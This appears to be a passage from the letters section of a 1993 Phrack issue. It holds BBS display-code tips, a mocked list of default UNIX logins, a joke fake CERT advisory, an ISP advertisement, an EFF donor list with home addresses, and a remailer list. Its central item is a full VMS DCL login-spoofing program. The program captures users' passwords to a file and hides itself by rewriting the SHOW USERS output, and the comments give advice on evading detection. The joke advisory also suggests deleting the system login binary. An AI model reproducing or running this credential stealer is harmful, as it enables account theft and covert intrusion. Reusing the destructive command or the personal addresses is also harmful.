+  I'm having a really hard time finding a lead to the Information
+America Network.  I am writing you guys as a last resort.  Could
+you point me in the right direction?  Maybe an access number or
+something?  Thanks you very much.
+
+[Editor:  You can reach Information America voice at 404-892-1800.
+          They will be more than happy to send you loads of info.]
+
+****************************************************************************
+
+ To whom it may concern:
+This is a submission to the next issue of phrack...thanks for the great
+'zine!
+----------------------------cut here-------------------------------
+Greetings Furds:
+
+ Have you ever wanted to impress one of those BBS-babes with your astounding
+knowledge of board tricks?  Well *NOW* you can!  Be the life of the party!
+Gain and influence friends!  Irritate SysOps!  Attain the worship and
+admiration of your online pals.  Searchlight BBS systems (like many other
+software packages) have internal strings to display user information in
+messages/posts and the like.  They are as follows (tested on Searchlight BBS
+System v2.25D):
+
+        \%A  =  displays user's access level
+        \%B  =  displays baud rate connected at
+        \%C  =  unknown
+        \%F  =  unknown
+        \%G  =  displays graphics status
+        \%K  =  displays user's first name
+        \%L  =  displays system time
+        \%M  =  displays user's time left on system
+        \%N  =  displays user's name in format: First Last
+        \%O  =  times left to call "today"
+        \%P  =  unknown
+        \%S  =  displays line/node number and BBS name
+        \%T  =  displays user's time limit
+        \%U  =  displays user's name in format: FIRST_LAST
+
+All you gotta do is slam the string somewhere in the middle of a post or
+something and the value will be inserted for the reader to see.
+
+ Example:  Hey there chump, I mean \%K, you better you better UL or log
+           off of \%S...you leach too damn many files..you got \%M mins
+           left to upload some new porn GIFs or face bodily harm and
+           mutilation!.
+
+                      ----------------------------
+
+Have phun!
+Inf0rmati0n Surfer (& Dr. Cloakenstein)
+SysOp Cranial Manifestations vBBS
+
+
+[Editor:  Ya know, once a LONG LONG time ago, I got on a BBS and
+          while reading messages noticed that a large amount of
+          messages seemed to be directed at ME!!#  It took me
+          about 10 minutes to figure it out, but BOY WAS I MAD!
+
+          Then I added my own \%U message for the next hapless fool.
+          :)  BIG FUN!]
+
+****************************************************************************
+
+-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-
+
+                                 SotMESC
+
+                   The US SotMESC Chapter is offering
+                 Scholarships for the 1993 school term.
+
+              Entries should be single-spaced paragraphs,
+                  Double-spacing between paragraphs.
+
+               The subject should center on an aspect of the
+            Computer Culture and be between 20-30 pages long.
+
+                           Send entries to:
+
+                               SotMESC
+                              PO Box 573
+                         Long Beach, MS 39560
+
+    All entries submitted will become the property of the SotMESC
+
+-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-
+
+****************************************************************************
+
+           The Southwest Netrunner's League's
+-----------------------------------------------------------------
+  WareZ RoDeNtZ Guide to UNIX!!!!
+-----------------------------------------------------------------
+
+ Compiled by:The Technomancer (UNICOS,UNIX,VMS,and Amigas)
+ Assists  by:SysCon XIV       (The Ma'Bell Rapist)
+      Iron Man MK 4a   (Things that make ya go boom)
+
+ This file begs to be folded, spindeled,and mutilated.
+ No Rights Reserved@1993
+
+-----------------------------------------------------------------
+
+  Technomancer can be reached at: af604@FreeNet.hsc.colorado.edu
+
+  Coming this September.... Shadowland, 68020... Watch this space.
+-----------------------------------------------------------------
+
+Part I(Basic commands)
+
+Phile Commands: ls=List Philes
+  more,page=Display Phile on Yo Terminal
+  cp=Copy Phile
+  mv=Move or Remove Philes
+  rm=Remove Philes
+
+Editor Commnds: vi=Screen Editor
+
+Dirtory cmmnds: dir=Prints Directory
+  mkdir=Makes a new Directory(also a VERY bad bug)
+  rmdir=Remove a Directory
+  pwd=print working directory
+
+Misc. Commands: apropos=Locate commands by keyword lookup.
+  whatis=Display command description.
+  man=Displays manual pages online.
+  cal=Prints calendar
+  date=Prints the time and date.
+  who=Prints out every one who is logged in
+      (Well, almost everyone 7:^]  )
+
+---------------------------------------------------------------
+
+Part II(Security(UNIX security, another OXYMORON  7:^]  ))
+
+If you are a useless wAReZ r0dEnT who wants to try to Netrun
+a UNIX system, try these logins....
+
+ root
+ unmountsys
+ setup
+ makefsys
+ sysadm
+ powerdown
+ mountfsys
+ checkfsys
+
+
+All I can help ya with on da passwords iz ta give you some
+simple guidelines on how they are put together....
+
+ 6-8 characters
+ 6-8 characters
+ 1 character is a special character (exmpl:# ! ' & *)
+
+-----------------------------------------------------------------
+
+Well thats all fo' now tune in next time, same Hack-time
+       same Hack-channel!!!
+
+
+ THE TECHNOMANCER           I have taken all knowledge
+   af604@FreeNet.hsc.colorado.edu
+                                   to be my province
+
+--
+Technomancer
+Southwest Netrunner's League
+
+*****************************************************************
+
+[Editor:  This is an example of what NOT to send to Phrack.
+          This is probably the worst piece of garbage I've
+          received, so I had to print it.  I can only hope
+          that it's a private joke that I just don't get.
+
+          Uh, please don't try to write something worse and
+          submit it hoping to have it singled out as the
+          next "worst," since I'll just ignore it.]
+
+****************************************************************************
+
+Dear Phrack,
+   I was looking through Phrack 42 and noticed the letters about password
+stealers. It just so happened that the same day I had gotten extremely
+busted for a program which was infinitely more indetectible. Such is life.
+I got off pretty well being an innocent looking female so it's no biggie.
+Anyway, I deleted the program the same day because all I could think was
+"Shit, I'm fucked". I rewrote a new and improved version, and decided to
+submit it. The basic advantages of this decoy are that a) there is no
+login failure before the user enters his or her account, and b) the
+program defines the show users command for the user so that when they
+do show users, the fact that they are running out of another account
+doesn't register on their screen.
+   There are a couple holes in this program that you should probably be
+aware of. Neither of these can kick the user back into the account that
+the program is running from, so that's no problem, but the program can
+still be detected. (So basically, don't run it out of your own account...
+except for maybe once...to get a new account to run it out of) First, once
+the user has logged into their account (out of your program of course) hitting
+control_y twice in a row will cause the terminal to inquire if they are
+doing this to terminate the session on the remote node. Oops. It's really no
+problem though, because most users wouldn't even know what this meant. The
+other problem is that, if the user for some strange reason redefines show:
+
+$show == ""
+
+then the show users screen will no longer eliminate the fact that the account
+is set host out of another. That's not a big deal either, however, because
+not many people would sit around randomly deciding to redefine show.
+   The reason I was caught was that I (not even knowing the word "hacker"
+until about a month ago) was dumb enough to let all my friends know about the
+program and how it worked. The word got spread to redefine show, and that's
+what happened. The decoy was caught and traced to me. Enough BS...here's the
+program. Sorry...no UNIX...just VMS.
+                                            Lady Shade
+
+I wrote the code...but I got so many ideas from my buddies:
+Digital Sorcerer, Y.K.F.W., Techno-Pirate, Ephemereal Presence, and Black Ice
+
+------------------------------------------------
+
+$if p1 .eqs. "SHOW" then goto show
+$sfile = ""
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!! The role of the dummy file in this program is to tell if the program !!!!
+!!!! is being used as a decoy or as a substitute login for the victim. It !!!!
+!!!! does not stay in your directory after program termination.           !!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+$sfile = f$search("sys$system:[ZJABAD_X]dummy.txt")
+$if sfile .nes. "" then goto other
+$open/write io user.dat
+$close io
+$open/write dummy instaar_device:[miller_g]dummy.txt
+$close dummy
+$wo == "write sys$output"
+$line = ""
+$user = ""
+$pass = ""
+$a$ = ""
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!! A login screen with a message informing someone of new mail wouldnt !!!!
+!!!! be too cool...                                                      !!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+$set broadcast=nomail
+$set message/noidenficitaion/noseverity/nofacility/notext
+$on error then goto outer
+$!on control_y then goto inner
+$wo " [H [2J"
+$wo ""
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!! insert a fake logout screen here !!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+$wo "   ZJABAD_X     logged out at ", f$time()
+$wo " [2A"
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!! This is the main body of the program. It simulates the system login !!!!
+!!!! screen. It also grabs the username and password and sticks them in  !!!!
+!!!! a file called user.dat                                              !!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+$outer:
+$set term/noecho
+$inquire a$/nopun ""
+$inquire a$/nopun ""
+$set term/echo
+$c = 0
+$c1 = 0
+$c2 = 0
+$inner:
+$c2 = c2 + 1
+$if c2 .eqs. 5 then goto speedup
+$c = c + 1
+$if c .eqs. 15 then goto fail
+$if c1 .eqs. 3 then goto fail3
+$user = "a"
+$wo "Username: "
+$from_speedup:
+$set term/uppercase
+$wo " [2A"
+$read/time_out=10/prompt=" [9C " sys$command user
+$if user .eqs. "a" then goto timeout
+$set term/nouppercase
+$if user .eqs. "" then goto inner
+$set term/noecho
+$inquire pass "Password"
+$set term/echo
+$if user .eqs. "ME" then goto done
+$if pass .eqs. "" then goto fail
+$open/append io user.dat
+$write io user + " " + pass
+$close io
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!! Sends the user into their account !!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+$open/write io set.com
+$write io "$set host 0"
+$write io user + "/COMMAND=INSTAAR_DEVICE:[MILLER_G]FINDNEXT"
+$write io pass
+$close io
+$@set
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!! Control has been returned to your account !!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+$write io " [2A"
+$goto outer
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!! Simulates a failure if the password is null, and also if the !!!!
+!!!! username prompt has cycled through 15 times... This is what  !!!!
+!!!! the system login screen does.                                !!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+$fail:
+$c = 1
+$c1 = c1 + 1
+$wo "User authorization failure"
+$wo " [1A"
+$goto inner
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!! After the third failure, the system usually sends the screen back !!!!
+!!!! one step...this just handles that.                                !!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+$fail3:
+$wo " [2A"
+$goto outer
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!! The system keeps a timeout check in the login. If a username is not !!!!
+!!!! entered quickly enough, the timeout message is activated            !!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+$timeout:
+$set term/nouppercase
+$wo "Error reading command input"
+$wo "Timeout period expired"
+$wo " [2A"
+$goto outer
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!! There is a feature in this program which sets the terminal to        !!!!
+!!!! uppercase for the input of a username. This is wonderful for         !!!!
+!!!! preventing program detection, but it does cause a problem. It slows  !!!!
+!!!! the screen down, which looks suspicious. So, in the case where a     !!!!
+!!!! user walks up tot he terminal and holds the return key down for a    !!!!
+!!!! bit before typing in their username, this section speeds up the run  !!!!
+!!!! considerably.                                                        !!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+$speedup:
+$set term/nouppercase
+$fast_loop:
+$user = "a"
+$read/time_out=1/prompt="Username: " sys$command io
+$if user .eqs. "a" then goto from_speedup
+$goto fast_loop
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!! This section is optional. There are many ways that you can implement !!!!
+!!!! to break out of the program when you think you have gotten enough    !!!!
+!!!! passwords. 1), you can sit down at the terminal and type in a string !!!!
+!!!! for the username and pass which kicks you out. If this option is     !!!!
+!!!! implemented, you should at least put in something that looks like    !!!!
+!!!! you have just logged in, the program should not kick straight back   !!!!
+!!!! to your command level, but rather execute your login.com. 2) You     !!!!
+!!!! can log in to the account which is stealing the password from a      !!!!
+!!!! different terminal and stop the process on the account which is      !!!!
+!!!! running the program. This is much safer, and my recommandation.      !!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+$done:
+$set broadcast=mail
+$set message/facility/text/identification/severity
+$delete dummy.txt;*
+$exit
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!! This section is how one covers up the fact that the account which has !!!!
+!!!! been stolen is running out of another. Basically, the area of the show!!!!
+!!!! users screen which registers this is at the far right hand side.      !!!!
+!!!! This section first writes the show users data to a file and alters    !!!!
+!!!! it before it is written to the screen for viewing by the user. There  !!!!
+!!!! may exist many forms of the show users command in your system, and    !!!!
+!!!! you may have to handle each one differently. I have written only two  !!!!
+!!!! manipulations into this code to be used as an example. But looking    !!!!
+!!!! at how this is preformed should be enough to allow you to write your  !!!!
+!!!! own special cases. Notice that what happens to activate this section  !!!!
+!!!! of the program is the computer detects the word "show" and interprets !!!!
+!!!! it as a procedure call. The words following show become variables     !!!!
+!!!! passed into the program as p1, p2, etc. in the order which they       !!!!
+!!!! were typed after the word show. Also, by incorporating a third data   !!!!
+!!!! file into the manipulations, one can extract the terminal id for the  !!!!
+!!!! account which the program is running out of and plug this into the    !!!!
+!!!! place where the user's line displays his or her terminal id. Doing    !!!!
+!!!! this is better that putting in a fake terminal id, but that is just a !!!!
+!!!! minor detail.                                                         !!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+$show:
+$show = ""
+$show$ = ""
+$length = 0
+$ch = ""
+$full = 0
+$c = 0
+$if (f$extract(5,1,p2) .eqs. "/") .and. (f$extract(6,4,p2) .nes. "FULL") then show 'p1'
+$if (p2 .eqs. "USERS/FULL") .and. (p3 .eqs. "") then goto ufull
+$if p2 .eqs. "USERS" .and. p3 .eqs. "" then show users
+$if p2 .eqs. "USERS" .and. p3 .eqs. "" then exit
+$if p3 .eqs. "" then goto fallout
+$goto full
+$fallout:
+$show 'p2' 'p3'
+$exit
+$ufull:
+$show users/full/output=users.dat
+$goto manipulate
+$full:
+$show$ = p3 + "/output=users.dat"
+$show users 'show$'
+$manipulate:
+$set message/nofacility/noseverity/notext/noidentification
+$open/read io1 users.dat
+$open/write io2 users2.dat
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!! Control_y must be dealt with here. If the user did happen to controlY !!!
+!!!! there is a chance that the files users.dat and users2.dat could be    !!!
+!!!! left in their directory. That is a bad thing as we are trying to      !!!
+!!!! prevent detection :)                                                  !!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+$on control_y then goto aborted
+$user = ""
+$test = ""
+$long = ""
+$ch = ""
+$length = 0
+$user = f$user()
+$length = f$length(user) - 2
+$user = f$extract(1,length,user)
+$read_loop:
+$read/end_of_file=eof io1 line
+$test = f$extract(1,length,line)
+$ch = f$extract (length+1,1,line)
+$if (test .eqs. user) .and. (ch .eqs. " ") then goto change
+$from_change:
+$write io2 line
+$goto read_loop
+$eof:
+$close io1
+$close io2
+$type users2.dat
+$del users.dat;*
+$del users2.dat;*
+$show == "@instaar_device:[MILLER_G]findnext show"
+$set message/facility/text/severity/identification
+$exit
+$change:
+$if f$extract(50,1,line) .nes. "" then line = f$extract(0,57,line) + "(FAKE TERMINAL INFO)"
+$goto from_change
+$aborted:
+$!if f$search("users.dat") .nes. "" then close io1
+$!if f$search("users.dat") .nes. "" then delete users.dat;*
+$!if f$search("users2.dat") .nes. "" then close io2
+$!if f$search("users2.dat") .nes. "" then delete users2.dat;*
+$close io1
+$close io2
+$delete users.dat;*
+$delete users2.dat;*
+$show == "@instaar_device:[MILLER_G]findnext show"
+$set message/facility/text/severity/identification
+$exit
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!! This is the section of the program which is executed in place of the !!!!
+!!!! users login.com. It does grab their login and execute it to prevent  !!!!
+!!!! suspicion, but there are a couple of hidden commands which are also  !!!!
+!!!! added. They redefine the show and sys commands so that the user can  !!!!
+!!!! not detect that he or she is riding off of another account.          !!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+$other:
+$sh$ = "@instaar_device:[miller_g]findnext show"
+$shline = "$sh*ow ==" + sh$
+$logi = ""
+$logi = f$search("login.com")
+$if logi .NES. "" then goto Ylogin
+$nologin:
+$open/write io login2.com
+$write io shline
+$close io
+$@login2
+$delete login2.com;*
+$exit
+$ylogin:
+$open/write io2 login2.com
+$open/read io1 login.com
+$transfer_loop:
+$read/end_of_file=ready io1 line
+$write io2 line
+$goto transfer_loop
+$ready:
+$write io2 "$sh*ow == ""@instaar_device:[miller_g]findnext show""
+$close io1
+$close io2
+$@login2
+$delete login2.com;*
+$exit
+
+
+[Editor:  Thanks for the letter and program.  I wish I could bring
+          myself to use a VMS and try it out.  :)  Always happy
+          to get notice that somewhere out there a female reads
+          Phrack.  By the way, "innocent female" is an oxymoron.]
+
+****************************************************************************
+
+To:   Phrack Loopback.
+From: White Crocodile.
+
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+ Greetings sweet Phrack and Mr. Bloodaxe. Your "loopback reports"  is
+ really cool invention and I (sorry for egoisthic "I") with  pleasure
+ wasting time for his reading ( ex. my playboy time ). But  here  for
+ some unknown reason appear equal  style,  and  all  loopback  remind
+ something medium between "relations search" [Hello Dear Phrack, I am
+ security expert of our local area, but when I looked  to  output  of
+ "last" program (oh,yeah - "last" it is ...), I ocassionaly  under  -
+ standed  what apparently someone elite  hacker  penetrated  into  my
+ unpassworded  account!  But  how  he  knew  it???  I  need  to  talk
+ with him! Please mail me at security@...] and "make yourself" [Yep.I
+ totally wrote program which gets file listing from target  vicitim's
+ home directory in current host. After that I decided  to  contribute
+ it for You. I hope this will help. Here is the complete C code. "rx"
+ permission in target's '$HOME' required.].
+  Looking similar articles like "... off Geek!" and  various  reports
+ which don't reacheds PWN. [CENSORED BY ME].
+  Resulting from abovewritten reason and I let  myself  to  add  some
+ elite (oops word too complex), some bogus and little deposit to Your
+ lb. He written in classic plagiarize style.
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+                             *  *  *
+Good mornin' Ladys and Gentelmen! I hacking and phreaking. I know what
+it is horrible (don't read it please - this message to Bart),  but  I
+doing it all the time (today already 3 month). I have not much time to
+write, and here is the subject - I broke into  one  military  computer
+and stole their mail about new security bug!!! l00k f3r |t:
+
+                                - - -
+          DDN & CERT
+                            SPECIAL REPORT*
+          Sun 3.x,4.1.x login flaw
+
+Subject: The huge Sun 4.x login hole.(possibly Ulitix 3.0,BSD,AIX
+                                       and many yet unknown systems)
+
+Impact: Allow random intruders to gain "root" access.
+
+Description:
+   The huge security hole was there and waiting! Type:
+
+     $ login root
+
+   [ no option required ], and You are! All what You need to know its
+   just root's password, but it (pw), sure, can be easily obtained from
+   real root, by asking him (root). Ex - "$ talk root"
+
+Possible fix until copyrighted patch come out:
+
+     #rm /usr/bin/login
+     #cp /usr/games/fortune /usr/bin/login
+
+If you believe that your system has been compromised, contact CERT CC. Call
+our hotline 900-FBI-PRIVATE (24 a day,please not in dinner time or in  time
+of "Silence of the Lamb"), leave Inet address of your system and  number of
+private credit card.
+                               - - -
+
+* Report not will be printed in cert advisories in this form, becouse FBI
+   need remove all hints and tips, and make him useless to intruders.
+
+DISCLAIMER: Above document written by CERT, DDN and FBI -
+                                      all pretension to them.
+
+Thanks to gr*k (I can't write his full name for security reasons),roxtar,
+y0,Fidelio,2 scotts from Santafe,KL (He not have attitude  towards  this
+mail,but I included him for polite since he reserved tickets for me  to
+SUMMERCON),ahh,x0d,all zero's (count,bob,nick,etc.) and many others for
+hints to me, what this bug really exist (Yep, before I stoled report).
+
+ - Write You later - anonymous.
+
+P.S. Yup! If You won't think what I am toady - I wanna say also thanks to TK
+and sure Erik Bloodaxe. And also - IF after E911 incident you are more
+carefully, feel free to replace "stole" to "got" (when you'll post it),  and
+do not forget to add "reprinted with permission".
+
+ - Sincerely, anonymous.
+
+----------------------------------------------------------------------
+
+[Editor:  More indications that we will all be raided by the DEA
+          more often than the FBI in coming years.]
+
+*****************************************************************************
+
+
+ "Since my probation status forces me to be adamant about this. Illegal
+  activities on Netsys cannot and will not be tolerated. Prison sucked."
+
+                                    - Len Rose
+
+ 06/6/93
+
+ NETSYS COMMUNICATION SERVICES  Palo Alto, California
+
+ Netsys is a network of large Sun servers dedicated to providing
+ Internet access to individuals and corporations that need solid,
+ reliable Internet connectivity.  Netsys is at the hub of major
+ Internet connectivity.
+
+ Netsys is a system for professionals in both the Internet and Unix
+ community. The public image is important to us. Illegal activities
+ cannot be tolerated.
+
+ Netsys has every feature you could possibly need.
+
+ Netsys is lightly loaded, extremely reliable and dedicated to providing
+ full time 24 hour Internet access.
+
+ Support: 24 hour emergency response service.
+
+ Dialups: Palo Alto area, High Speed (V.32 and PEP)
+
+ Private Accounts: $20 monthly ( with file storage capacity of 5 megabytes)
+
+                   $1 per megabyte per month over 5 megabytes.
+
+ Commercial Accounts: $40 monthly (file storage capacity of 10 megabytes)
+                      $1 per megabyte per month over 10 megabytes.
+
+ Newsfeeds: We offer both nntp and uucp based newsfeeds , with all domestic
+            newsgroups, and including all foreign newsgroups.
+
+               SPECIAL FEATURES THAT NO ONE ELSE CAN PROVIDE
+
+ Satellite Weather: Netsys has available real time satellite weather
+                    imagery. Images are available in gif, or Sun raster
+                    format. Contact us for NFS mirroring, and other special
+                    arrangement. These images are directly downlinked from
+                    the GOES bird. Contact Steve Eigsti (steve@netsys.com)
+
+ Satellite Usenet: Netsys is offering Pagesat's satellite newsfeed service
+
+                   for large volume news distribution. Members of Netsys
+                   can obtain substantial discounts for the purchase and
+                   service costs of this revolutionary method of Usenet news
+                   distribution.  Both Unix and MS Windows software available.
+                   Contact (pagesat@pagesat.com) for product information.
+
+ Paging Services: Netsys is offering Pagesat's Internet to Pager mail service.
+                  Members of Netsys can obtain critical email to pager
+                  services. Pagesat has the ability to gateway any critical
+                  electronic mail to your display pager.
+
+                      Leased Line Internet Connections
+
+  Pagesat Inc. offers low cost 56k and T1 Internet connections all over the
+  United States. Since Pagesat is an FCC common carrier, our savings on
+  leased lines can be passed on to you. For further information, contact
+  Duane Dubay (djd@pagesat.com).
+
+ We offer other services such as creating domains, acting as MX
+ forwarders, and of course uucp based newsfeeds.
+
+ Netsys is now offering completely open shell access to Internet users.
+ For accounts, or more information , send mail to netsys@netsys.com
+
+ Netsys will NEVER accept more members than our capacity to serve.
+
+ Netsys prides itself on it's excellent connectivity (including multiple T1's,
+ and SMDS), lightly loaded systems, and it's clientele.
+
+ We're not your average Internet Service Provider. And it shows.
+--------------------------------------------------------------------
+[Editor:  We here at Phrack are forever in debt to Mr. Len Rose for
+          allowing us to use ftp.netsys.com as our new official FTP
+          site after getting the boot off EFF.  It takes a steel
+          set of huevos to let such an evil hacker publication
+          reside on your hard drive after serving time for having
+          dealings with evil hackers.  We are STOKED!  Thanks Len!
+          Netsys is not your average site, INDEED!]
+
+****************************************************************************
+
+Something Phrack might like to see:
+
+The contributors to and practices of the Electronic Frontier Foundation
+disclose quite accurately, just who this organization represents.  We
+challenge the legitimacy of the claim that this is a "public interest"
+advocate.  Here is a copy of their list of contributors:
+
+[FINS requested the Office of the Attorney General of the Commonwealth of
+Massachusetts to provide us with a list of contributors of over $5000, to
+the Electronic Frontier Foundation, required by IRS Form 990.  Timothy E.
+Dowd, of the Division of Public Charities, provided us with a list (dated
+January 21, 1993), containing the following information.  No response was
+given to a phone request by FINS directly to EFF, for permission to inspect
+and copy the most current IRS Form 990 information.]
+
+
+
+                  ELECTRONIC FRONTIER FOUNDATION, INC.
+              IRS FORM 990. PART I - LIST OF CONTRIBUTIONS
+
+
+NAME AND ADDRESS OF CONTRIBUTOR       CONTRIBUTION
+                                    DATE      AMOUNT
+
+Kapor Family Foundation
+C/O Kapor Enterprises, Inc.
+155 2nd Street
+Cambridge, MA 02141                Var       100,000
+
+Mitchell D. Kapor
+450 Warren Street
+Brookline, MA 02146                Var       324,000
+
+Andrew Hertzfeld
+370 Channing Avenue
+Palo Alto, CA 94301                12/12/91    5,000
+
+
+Dunn & Bradstreet
+C/O Michael F. ...
+1001 G Street, NW Suite 300 East
+Washington, DC 20001               02/12/92   10,000
+
+National Cable Television
+1724 Massachusetts Avenue, NW
+Washington, DC 20036               02/18/92   25,000
+
+
+MCI Communications Corporation
+1133 19th Street, NW
+Washington, DC 20036               03/11/92   15,000
+
+American Newspaper Publishers
+Association
+The Newspaper CTR
+11600 Sunrise Valley
+Reston, VA 22091                   03/23/92   20,000
+
+Apple Computer
+20525 Mariani Avenue MS:75-61
+Cupertino, CA 95014                03/23/92   50,000
+
+Sun Microsystems, Inc
+c/o Wayne Rosing
+2550 Garcia Ave
+Mountain View, CA 94043-1100       04/03/92   50,000
+
+Adobe Systems, Inc.
+c/o William Spaller
+1585 Charlestown Road
+Mountain View, CA 94039-7900       04/16/92   10,000
+
+International Business Systems
+c/o Robert Carbert, Rte 100
+Somers, NY 10589                   05/07/92   50,000
+
+Prodigy Services Company
+c/o G. Pera...
+445 Hamilton Avenue
+White Plains, NY 10601             05/07/92   10,000
+
+Electronic Mail Associates
+1555 Wilson Blvd. Suite 300
+Arlington, VA 22209                05/13/92   10,000
+
+Microsoft
+c/o William H. Neukom
+1 Microsoft Way
+Redmond, VA 98052                  06/25/92   50,000
+
+David Winer
+933 Hermosa Way
+Menio Park, CA 94025               01/02/92    5,000
+
+Ed Venture Holdings
+c/o Ester Dvson
+375 Park Avenue
+New York, NY 10152                 03/23/92   15,000
+
+Anonymous                          12/26/91   10,000
+
+Bauman Fund
+c/o Patricia Bauman
+1731 Connecticut Avenue
+Washington, DC 20009-1146          04/16/92    2,500
+
+Capital Cities ABA
+c/o Mark MacCarthy
+2445 N. Street, NW Suite 48
+Washington, DC 20037               05/04/92    1,000
+
+John Gilmore
+210 Clayton Street
+San Francisco, CA 94117            07/23/91    1,488
+                                   08/06/91  100,000
+
+Government Technology              10/08/91    1,000
+
+Miscellaneous                      04/03/91      120
+
+Apple Writers Grant
+c/o Apple Computer
+20525 Mariani Avenue               01/10/92    15,000
+
+
+[Editor:  Well, hmmm.  Tell you guys what:  Send Phrack that
+          much money and we will give up our ideals and move to
+          a new location, and forget everything about what we
+          were all about in the beginning.  In fact, we will turn
+          our backs on it.  Fair?
+
+          I was talking about me moving to Europe and giving
+          up computers.  Don't read anything else into that.  Nope.]
+
+****************************************************************************
+
+-----BEGIN PGP SIGNED MESSAGE-----
+
+Q1: What cypherpunk remailers exist?
+
+A1:
+
+ 1: hh@pmantis.berkeley.edu
+ 2: hh@cicada.berkeley.edu
+ 3: hh@soda.berkeley.edu
+ 4: nowhere@bsu-cs.bsu.edu
+ 5: remail@tamsun.tamu.edu
+ 6: remail@tamaix.tamu.edu
+ 7: ebrandt@jarthur.claremont.edu
+ 8: hal@alumni.caltech.edu
+ 9: remailer@rebma.mn.org
+10: elee7h5@rosebud.ee.uh.edu
+11: phantom@mead.u.washington.edu
+12: hfinney@shell.portal.com
+13: remailer@utter.dis.org
+14: 00x@uclink.berkeley.edu
+15: remail@extropia.wimsey.com
+
+NOTES:
+#1-#6  remail only, no encryption of headers
+#7-#12  support encrypted headers
+#15  special - header and message must be encrypted together
+#9,#13,#15 introduce larger than average delay (not direct connect)
+#14  public key not yet released
+
+#9,#13,#15      running on privately owned machines
+
+======================================================================
+
+Q2: What help is available?
+
+A2:
+
+Check out the pub/cypherpunks directory at soda.berkeley.edu
+(128.32.149.19).  Instructions on how to use the remailers are in the
+remailer directory, along with some unix scripts and dos batch files.
+
+Mail to me (elee9sf@menudo.uh.edu) for further help and/or questions.
+
+======================================================================
+
+
+-----BEGIN PGP SIGNATURE-----
+Version: 2.2
+
+iQCVAgUBLAulOYOA7OpLWtYzAQHLfQP/XDSipOUPctZnqjjTq7+665MWgysE1ex9
+lh3Umzk2Q647KyqhoCo8f7nVrieAZxK0HjRFrRQnQCwjTSQrve2eAQ1A5PmJjyiI
